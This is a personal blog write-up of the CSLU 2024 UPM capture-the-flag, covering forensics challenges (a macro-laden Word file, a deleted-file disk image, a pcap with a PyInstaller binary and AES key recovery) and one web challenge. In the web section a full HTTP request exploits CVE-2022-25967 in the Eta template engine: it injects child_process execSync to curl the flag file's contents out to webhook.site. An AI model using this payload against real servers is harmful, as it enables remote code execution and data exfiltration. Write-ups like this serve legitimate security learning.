CSLU 2024 UPM
Forensics
Dr. Mals
- Download the Dr. Mals word file
- Use Oletools - olevba to decrypt this file
- With the use of CyberChef, we can find out the encoded text
- Searching the website and it given
- Lets decode this
- With the use of online decoderwe can find out the flag
- Thats it.
Acknowledgement
Thx to Akram for providing Hint
RE:Memory Delete
- First, we download the attached file given by the challenge.
- Challenge.7z
- Unzip it.
-Challenge.ad1 files inside. - .ad1 is a image files so lets use FTK Imager to find the deleted file
- There goes the flag
Skyfall
Pain killer, My Skill issue… XD
- Download the file attach by the challenge.
-capture.pcapng - Use wireshark to open the pcapng files
- See the clue given, Love the EDITED LEWIS VERSION files and lost the flag.
- File -> Export -> Http, and save all the files.
- we can see there is 5 files exported, 2 text file with word
File received successfully!
andfile_data=16ae9187d13259788a97aef16a7d50f8b6376fbcba92a0f53e7e68d9f562a3a6576a3183a8dc8631c64fbd9147c8b608
- usefull for later
- And there is a file with big data 24,345kb and let us see what file is that.
- Looks like it is a elf file
- I manage to find a website to extract the elf file EzyZIP
- We can see the largest file is here after extract
After have a long time searching, i cant found any ways to extract pydata… skill issue XD
- After the end of the day, my friend told me there is something call
Pyinstxtractor
that can extract it.- This is what i found
- okayyyy here is it
- Theres alot files inside, but the one the name
skyfall-lewis-edited-version.pyc
is the most suspicious. - With the use of this website Pylingual, i transfer pyc files to py
- We can see it is a AES encyption function and the key is the time which the user encrypt when downloaded, so lets go back to wireshark and find the date when she successfuly download.
- We can find out that the epoch for the time she download the file is
1733988750
- Then use GPT xd find the key out
- ps: I also dk why need to use
1733988749
just told by my friend to use it cant find any things that support this epoch XD.
- Okay, then let us go to decrypt it. Use cyberchef
Heres the flag.
Okay its maybe abit harder than i though. cry die.
Acknowledgement
Thx to Bakayang for providing solution at the end of the day
WEB
Useless Website
Download the source code of the website
We can see theres something in the package.json file
Searching on the internet
CVE-2022-25967
showing that there is some leakage can be use on the eta framework.In burpsuite, intercept the web and change to this
/utils/settings HTTP/1.1 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22Host: 5.75.155.50:1341
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/json
Upgrade-Insecure-Requests: 1
If-None-Match: W/"1057-ih1IUXlwncna8aHynJLYIHjiX30"
Priority: u=0, i
Content-Length: 292
{
"settings": {
"view options": {
"varName": "x=process.mainModule.require('child_process').execSync('curl https://webhook.site/self id/$(cat /flag.txt)')",
"include": false,
"includeFile": false,
"useWith": true
}
}
}And we can find out the flag at the end of the webhook link.
CSLU{wh4ts_y0ur_et4?}
Acknowledgement
Thx for Megat for the solution.
- Title: CSLU 2024 UPM
- Author: Lee Wei Xuan
- Created at : 2024-12-31 12:18:46
- Updated at : 2024-12-31 13:24:46
- Link: https://redefine.ohevan.com/2024/12/31/CSLU-2024-UPM/
- License: This work is licensed under CC BY-NC-SA 4.0.
Comments